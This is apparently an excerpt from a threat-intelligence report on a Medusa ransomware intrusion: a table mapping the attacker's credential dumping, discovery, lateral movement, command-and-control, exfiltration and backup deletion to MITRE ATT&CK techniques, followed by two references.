Credential Access OS Credential Dumping: LSASS Memory T1003.001 Mimikatz was utilised.  An LSASS memory dump was created.  
Credential Access OS Credential Dumping: NTDS T1003.003 Ntdsutil.exe was used to extract the NTDS. 
Discovery Domain Trust Discovery T1482 Nltest was used to enumerate domain trusts.  
Discovery Permission Groups Discovery: Domain Groups T1069.002 Net was used to enumerate domain groups. 
Discovery System Network Configuration Discovery T1016 Ipconfig was used to learn about network configurations.  
Discovery System Service Discovery T1007 Tasklist was used to display running processes.  
Discovery Remote System Discovery T1018 Net was used to enumerate domain computers.  
Discovery System Owner/User Discovery T1033 Quser was used to show logged in users. Whoami was used to establish which user the threat actor was running as.  
Discovery System Information Discovery T1082 Wmic was used to gather the name of the operating system and its architecture.  
Lateral Movement  Remote Services: Remote Desktop Protocol T1021.001 RDP was used to laterally move through the environment.  
Command and Control Ingress Tool Transfer T1105 PowerShell commands were used to download and execute malicious files.  
Command and Control Remote Access Software T1219 JWrapper and AnyDesk were leveraged. 
Command and Control Protocol Tunnelling T1572 A reverse tunnel was established.   
Exfiltration  Exfiltration TA0010 Data was exfiltrated and published to the leak site.  
Impact  Data Encrypted for Impact T1486 Medusa ransomware was deployed. 
Impact Inhibit System Recovery T1490 VMs from the Hyper-V storage and local and cloud backups were deleted.  

References 

[1] https://www.bleepingcomputer.com/news/security/medusa-ransomware-gang-picks-up-steam-as-it-targets-companies-worldwide/  

[2] https://www.mdsec.co.uk/2020/10/covert-web-shells-in-net-with-read-only-web-paths/ 
